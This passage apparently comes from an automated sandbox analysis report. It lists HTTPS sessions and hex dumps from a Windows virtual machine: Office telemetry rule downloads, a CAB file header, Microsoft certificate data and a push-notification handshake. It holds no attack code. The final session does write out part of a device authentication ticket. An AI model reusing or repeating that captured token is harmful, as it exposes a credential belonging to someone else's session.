                                                                                                                                                                                              2024-11-24 12:39:59 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                              2024-11-24 12:39:59 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              116192.168.2.64987913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:58 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:59 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                              x-ms-request-id: 529557e1-c01e-0079-5045-3ce51a000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123959Z-15b8b599d882zv28hC1TEBdchn00000004bg000000006bw0
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:59 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              117192.168.2.64987813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:39:58 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:39:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:39:59 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                              x-ms-request-id: 90f21b32-801e-0047-4c0f-3e7265000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T123959Z-178bfbc474bwlrhlhC1NYCy3kg00000005wg00000000bdw9
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:39:59 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              118192.168.2.64988213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:00 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:01 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDB779FC3"
                                                                                                                                                                                              x-ms-request-id: a0a34a76-601e-0050-3b16-3d2c9c000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124001Z-178bfbc474bgvl54hC1NYCsfuw000000060g000000003khv
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:01 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 30 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 65 6d 65 74 72 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700400" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTelemetry" S="Medium" /> <F T="2


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              119192.168.2.64988313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:00 UTC192OUTGET /rules/rule700351v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:01 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1397
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDFD43C07"
                                                                                                                                                                                              x-ms-request-id: c780bae6-901e-005b-04c5-3b2005000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124001Z-174c587ffdfb5q56hC1TEB04kg00000004b000000000b82z
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:01 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              120192.168.2.64988413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:00 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:01 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1360
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                              x-ms-request-id: 2537bc41-601e-0050-496a-3c2c9c000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124001Z-174c587ffdfcb7qhhC1TEB3x7000000004dg00000000k322
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:01 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              121192.168.2.64988813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:01 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:01 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1390
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE3002601"
                                                                                                                                                                                              x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124001Z-174c587ffdfb74xqhC1TEBhabc00000004cg00000000dp8e
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:01 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              122192.168.2.64988713.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:01 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:01 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1427
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE56F6873"
                                                                                                                                                                                              x-ms-request-id: 38a59648-401e-00ac-39a0-3b0a97000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124001Z-174c587ffdfp4vpjhC1TEBybqw00000004eg000000008x32
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:01 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              123192.168.2.64988920.198.119.143443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:01 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 70 38 6c 50 54 68 5a 5a 79 55 57 72 44 4c 54 43 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 35 66 65 66 62 39 32 38 64 35 63 62 30 66 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: p8lPThZZyUWrDLTC.1Context: 6e5fefb928d5cb0f
                                                                                                                                                                                              2024-11-24 12:40:01 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                              2024-11-24 12:40:01 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 70 38 6c 50 54 68 5a 5a 79 55 57 72 44 4c 54 43 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 35 66 65 66 62 39 32 38 64 35 63 62 30 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 33 67 4a 6a 56 2b 4c 6c 52 52 4f 35 34 6f 43 36 51 42 74 34 30 36 63 61 52 58 54 66 66 49 6b 43 4e 76 2b 39 4b 42 47 55 31 66 4d 62 30 6c 55 62 63 77 48 78 59 4c 76 49 49 6e 4d 78 64 6c 34 6a 6b 39 51 46 63 4c 67 35 61 4c 31 4b 45 42 6c 47 71 42 77 47 34 34 67 47 63 4a 67 55 62 37 67 44 34 65 41 69 55 52 78 69 4d 78 5a 6d
                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: p8lPThZZyUWrDLTC.2Context: 6e5fefb928d5cb0f<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ3gJjV+LlRRO54oC6QBt406caRXTffIkCNv+9KBGU1fMb0lUbcwHxYLvIInMxdl4jk9QFcLg5aL1KEBlGqBwG44gGcJgUb7gD4eAiURxiMxZm
                                                                                                                                                                                              2024-11-24 12:40:01 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 70 38 6c 50 54 68 5a 5a 79 55 57 72 44 4c 54 43 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 65 35 66 65 66 62 39 32 38 64 35 63 62 30 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
